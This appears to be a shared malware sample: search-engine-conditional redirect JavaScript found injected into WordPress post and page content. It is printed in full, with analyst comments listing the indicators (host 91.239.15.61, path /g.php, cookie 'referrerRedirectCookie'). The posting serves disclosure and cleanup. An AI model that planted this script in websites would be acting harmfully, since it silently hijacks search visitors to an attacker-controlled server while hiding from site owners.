@littleiffel
Created November 28, 2013 21:21
Malware that I found in my WordPress installation. It was linked from post and page content in the database.
// Analyst note: this is a captured malicious sample, kept byte-for-byte so it can be
// matched against other infected sites. It is a conditional redirect: the visitor is
// sent to a hard-coded external address only when the referring URL contains a
// search-engine name and the marker cookie is not yet present in the browser.
// Visits with an empty or non-matching referrer are never redirected, so someone
// opening the site directly (presumably including the site owner) would not see it.
// Indicators visible in this listing: host 91.239.15[.]61, path /g.php, and the
// cookie "referrerRedirectCookie" with the value "do not redirect".
// The gist author reports that the script was linked from post and page content in
// the WordPress database, so cleanup has to cover stored content as well as files.
var from = document.referrer;
var i;
// Substrings looked for anywhere in the referrer URL; this is a plain substring
// test, not a hostname comparison.
var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
for (i = 0; i < se.length; ++i) {
// indexOf() returns -1 when the name is absent, so "+ 1" is truthy only on a match.
if (from.indexOf(se[i]) + 1) {
// checkCookie() is declared further down (function declarations are hoisted). It
// returns false only when the marker cookie is missing, and sets the cookie in that
// same call, so the redirect fires once per browser until the cookie is gone.
if (!checkCookie()) {
window.location = "http://91.239.15.61/g.php";
}
}
}
/**
 * Reads one cookie value out of document.cookie by name.
 *
 * Generic helper; in this sample it is used to look up the redirect marker cookie.
 *
 * @param {string} c_name - Cookie name to look for.
 * @returns {?string} The unescaped value, or null when no "name=" match is found.
 */
function getCookie(c_name) {
var c_value = document.cookie;
// First try " name=" (a cookie that is not the first in the string).
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1) {
// Fall back to "name=" anywhere in the string. This can also match a longer
// cookie name that merely ends with c_name.
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1) {
c_value = null;
}
else {
// The value runs from just after "=" up to the next ";" or the end of the string.
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1) {
c_end = c_value.length;
}
// unescape() is the deprecated counterpart of the escape() call in setCookie().
c_value = unescape(c_value.substring(c_start, c_end));
}
return c_value;
}
/**
 * Writes a cookie through document.cookie.
 *
 * Only the name, the escaped value and an optional expiry are written; no path,
 * domain or other attributes are set by this code.
 *
 * @param {string} c_name - Cookie name.
 * @param {string} value - Cookie value; passed through escape() before writing.
 * @param {?number} exdays - Lifetime in days; when null or undefined no "expires"
 *     attribute is appended.
 */
function setCookie(c_name, value, exdays) {
var exdate = new Date();
// Expiry is computed as today plus exdays days.
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
document.cookie = c_name + "=" + c_value;
}
/**
 * Tests for the redirect marker cookie and creates it when it is missing.
 *
 * Despite the name this is not a pure check: the false branch writes the cookie
 * "referrerRedirectCookie" with the value "do not redirect" and a 730-day expiry.
 * In this listing it is called only after the referrer matched a search-engine name,
 * so finding this cookie in a browser suggests the script ran there on such a visit.
 *
 * @returns {boolean} true when the marker cookie already holds a non-empty value;
 *     false when it was absent or empty and has just been set.
 */
function checkCookie() {
var referrerRedirectCookie = getCookie("referrerRedirectCookie");
if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
return true;
}
else {
// First matching visit from this browser: leave the marker so later visits are
// not redirected, then report "not seen before" to the caller.
setCookie("referrerRedirectCookie", "do not redirect", 730);
return false;
}
}